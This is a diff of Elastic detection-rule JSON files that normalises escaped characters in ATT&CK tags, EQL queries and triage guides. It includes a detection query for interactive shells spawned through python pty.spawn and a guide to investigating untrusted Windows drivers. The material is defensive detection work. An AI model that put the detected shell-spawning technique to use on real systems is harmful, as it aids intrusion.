a/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_103.json +++ b/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_103.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_104.json b/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_104.json index 94811c3038a..29827bc2f95 100644 --- a/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_104.json +++ b/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_104.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_105.json b/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_105.json index 23e9fa6e351..50d1c1aa3a8 100644 --- a/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_105.json +++ b/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_105.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_103.json b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_103.json index b15618c7e34..2d0b8943fbc 100644 --- a/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_103.json +++ b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_103.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_104.json b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_104.json index 1a4fe70ae64..2475d20af0b 100644 --- a/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_104.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_105.json b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_105.json index ad5141de31d..cf14e8aa1d8 100644 --- a/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_105.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_106.json b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_106.json index 357c2c3220e..b78a4e3190d 100644 --- a/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_106.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Interactive Terminal Spawned via Python", - "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and\n(\n (process.parent.name : \"python*\" and process.name : \"*sh\" and process.parent.args_count \u003e= 3 and\n process.parent.args : \"*pty.spawn*\" and process.parent.args : \"-c\") or\n (process.parent.name : \"python*\" and process.name : \"*sh\" and process.args : \"*sh\" and process.args_count == 1\n and process.parent.args_count == 1)\n)\n", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and\n(\n (process.parent.name : \"python*\" and process.name : \"*sh\" and process.parent.args_count >= 3 and\n process.parent.args : \"*pty.spawn*\" and process.parent.args : \"-c\") or\n (process.parent.name : \"python*\" and process.name : \"*sh\" and process.args : \"*sh\" and process.args_count == 1\n and process.parent.args_count == 1)\n)\n", "related_integrations": [ { "package": "endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_107.json b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_107.json index dc0d6ee01e0..21bb3c9a2f4 100644 --- a/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_107.json +++ b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_107.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Interactive Terminal Spawned via Python", - "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and\n(\n (process.parent.name : \"python*\" and process.name : \"*sh\" and process.parent.args_count \u003e= 3 and\n process.parent.args : \"*pty.spawn*\" and process.parent.args : \"-c\") or\n (process.parent.name : \"python*\" and process.name : \"*sh\" and process.args : \"*sh\" and process.args_count == 1\n and process.parent.args_count == 1)\n)\n", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and\n(\n (process.parent.name : \"python*\" and process.name : \"*sh\" and process.parent.args_count >= 3 and\n process.parent.args : \"*pty.spawn*\" and process.parent.args : \"-c\") or\n (process.parent.name : \"python*\" and process.name : \"*sh\" and process.args : \"*sh\" and process.args_count == 1\n and process.parent.args_count == 1)\n)\n", "related_integrations": [ { "package": "endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_108.json b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_108.json index 954701472d3..e100017f3c5 100644 --- a/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_108.json +++ b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_108.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Interactive Terminal Spawned via Python", - "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and\n(\n (process.parent.name : \"python*\" and process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\",\n \"fish\") and process.parent.args_count \u003e= 3 and process.parent.args : \"*pty.spawn*\" and process.parent.args : \"-c\") or\n (process.parent.name : \"python*\" and process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\",\n \"fish\") and process.args : \"*sh\" and process.args_count == 1 and process.parent.args_count == 1)\n)\n", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and\n(\n (process.parent.name : \"python*\" and process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\",\n \"fish\") and process.parent.args_count >= 3 and process.parent.args : \"*pty.spawn*\" and process.parent.args : \"-c\") or\n (process.parent.name : \"python*\" and process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\",\n \"fish\") and process.args : \"*sh\" and process.args_count == 1 and process.parent.args_count == 1)\n)\n", "related_integrations": [ { "package": "endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_109.json b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_109.json index cf5a173ece2..e1adbc890a0 100644 --- a/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_109.json +++ b/packages/security_detection_engine/kibana/security_rule/d76b02ef-fc95-4001-9297-01cb7412232f_109.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Interactive Terminal Spawned via Python", - "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and\n(\n (process.parent.name : \"python*\" and process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\",\n \"fish\") and process.parent.args_count \u003e= 3 and process.parent.args : \"*pty.spawn*\" and process.parent.args : \"-c\") or\n (process.parent.name : \"python*\" and process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\",\n \"fish\") and process.args : \"*sh\" and process.args_count == 1 and process.parent.args_count == 1)\n)\n", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and\n(\n (process.parent.name : \"python*\" and process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\",\n \"fish\") and process.parent.args_count >= 3 and process.parent.args : \"*pty.spawn*\" and process.parent.args : \"-c\") or\n (process.parent.name : \"python*\" and process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\",\n \"fish\") and process.args : \"*sh\" and process.args_count == 1 and process.parent.args_count == 1)\n)\n", "related_integrations": [ { "package": "endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d79c4b2a-6134-4edd-86e6-564a92a933f9_101.json b/packages/security_detection_engine/kibana/security_rule/d79c4b2a-6134-4edd-86e6-564a92a933f9_101.json index 54f1251c35e..9078fbea04d 100644 --- a/packages/security_detection_engine/kibana/security_rule/d79c4b2a-6134-4edd-86e6-564a92a933f9_101.json +++ b/packages/security_detection_engine/kibana/security_rule/d79c4b2a-6134-4edd-86e6-564a92a933f9_101.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d79c4b2a-6134-4edd-86e6-564a92a933f9_102.json b/packages/security_detection_engine/kibana/security_rule/d79c4b2a-6134-4edd-86e6-564a92a933f9_102.json index 00804cbeac8..4d3e4cb60d8 100644 --- a/packages/security_detection_engine/kibana/security_rule/d79c4b2a-6134-4edd-86e6-564a92a933f9_102.json +++ b/packages/security_detection_engine/kibana/security_rule/d79c4b2a-6134-4edd-86e6-564a92a933f9_102.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d79c4b2a-6134-4edd-86e6-564a92a933f9_103.json b/packages/security_detection_engine/kibana/security_rule/d79c4b2a-6134-4edd-86e6-564a92a933f9_103.json index b34c3ed18a3..db3fb0db772 100644 --- a/packages/security_detection_engine/kibana/security_rule/d79c4b2a-6134-4edd-86e6-564a92a933f9_103.json +++ b/packages/security_detection_engine/kibana/security_rule/d79c4b2a-6134-4edd-86e6-564a92a933f9_103.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d7d5c059-c19a-4a96-8ae3-41496ef3bcf9_101.json b/packages/security_detection_engine/kibana/security_rule/d7d5c059-c19a-4a96-8ae3-41496ef3bcf9_101.json index d9e7ea942bc..cc1602a7cae 100644 --- a/packages/security_detection_engine/kibana/security_rule/d7d5c059-c19a-4a96-8ae3-41496ef3bcf9_101.json +++ b/packages/security_detection_engine/kibana/security_rule/d7d5c059-c19a-4a96-8ae3-41496ef3bcf9_101.json @@ -29,7 +29,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d7d5c059-c19a-4a96-8ae3-41496ef3bcf9_102.json b/packages/security_detection_engine/kibana/security_rule/d7d5c059-c19a-4a96-8ae3-41496ef3bcf9_102.json index 14f1471aa04..c7505c11ef4 100644 --- a/packages/security_detection_engine/kibana/security_rule/d7d5c059-c19a-4a96-8ae3-41496ef3bcf9_102.json +++ b/packages/security_detection_engine/kibana/security_rule/d7d5c059-c19a-4a96-8ae3-41496ef3bcf9_102.json @@ -28,7 +28,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d7d5c059-c19a-4a96-8ae3-41496ef3bcf9_103.json b/packages/security_detection_engine/kibana/security_rule/d7d5c059-c19a-4a96-8ae3-41496ef3bcf9_103.json index 1588199870f..b4afc82a8a7 100644 --- a/packages/security_detection_engine/kibana/security_rule/d7d5c059-c19a-4a96-8ae3-41496ef3bcf9_103.json +++ b/packages/security_detection_engine/kibana/security_rule/d7d5c059-c19a-4a96-8ae3-41496ef3bcf9_103.json @@ -42,7 +42,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_100.json b/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_100.json index 35effd4c4e3..b307a6bf5b4 100644 --- a/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_100.json +++ b/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_100.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -66,7 +66,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_101.json b/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_101.json index 6046e4bfe8b..e30ed7d5f43 100644 --- a/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_101.json +++ b/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_101.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -63,7 +63,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_102.json b/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_102.json index a92342d9898..ca7829d5943 100644 --- a/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_102.json +++ b/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_102.json @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -62,7 +62,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_103.json b/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_103.json index ed11470d06e..4539fee4293 100644 --- a/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_103.json +++ b/packages/security_detection_engine/kibana/security_rule/d7e62693-aab9-4f66-a21a-3d79ecdd603d_103.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -69,7 +69,7 @@ "technique": [] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0010", "name": "Exfiltration", diff --git a/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_2.json b/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_2.json index 14109422537..a2f0a24bb1c 100644 --- a/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_2.json +++ b/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_2.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_3.json b/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_3.json index ac443d41b48..0da410e69dd 100644 --- a/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_3.json +++ b/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_3.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Untrusted Driver Loaded", - "note": "## Triage and analysis\n\n### Investigating Untrusted Driver Loaded\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies an attempt to load an untrusted driver, which effectively means that DSE was disabled or bypassed. This can indicate that the system was compromised.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. If you're using Elastic Defend, path information can be found in the `dll.path` field.\n - Examine the file creation and modification timestamps:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `dll.Ext.relative_file_name_modify_time` fields. The values are in seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Untrusted Driver Loaded\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies an attempt to load an untrusted driver, which effectively means that DSE was disabled or bypassed. This can indicate that the system was compromised.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. If you're using Elastic Defend, path information can be found in the `dll.path` field.\n - Examine the file creation and modification timestamps:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `dll.Ext.relative_file_name_modify_time` fields. The values are in seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "driver where host.os.type == \"windows\" and process.pid == 4 and\n dll.code_signature.trusted != true and \n not dll.code_signature.status : (\"errorExpired\", \"errorRevoked\")\n", "references": [ "https://github.com/hfiref0x/TDL", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_4.json b/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_4.json index 9ad03d5734d..c34fd8d978c 100644 --- a/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_4.json +++ b/packages/security_detection_engine/kibana/security_rule/d8ab1ec1-feeb-48b9-89e7-c12e189448aa_4.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Untrusted Driver Loaded", - "note": "## Triage and analysis\n\n### Investigating Untrusted Driver Loaded\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies an attempt to load an untrusted driver, which effectively means that DSE was disabled or bypassed. This can indicate that the system was compromised.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. If you're using Elastic Defend, path information can be found in the `dll.path` field.\n - Examine the file creation and modification timestamps:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `dll.Ext.relative_file_name_modify_time` fields. The values are in seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like 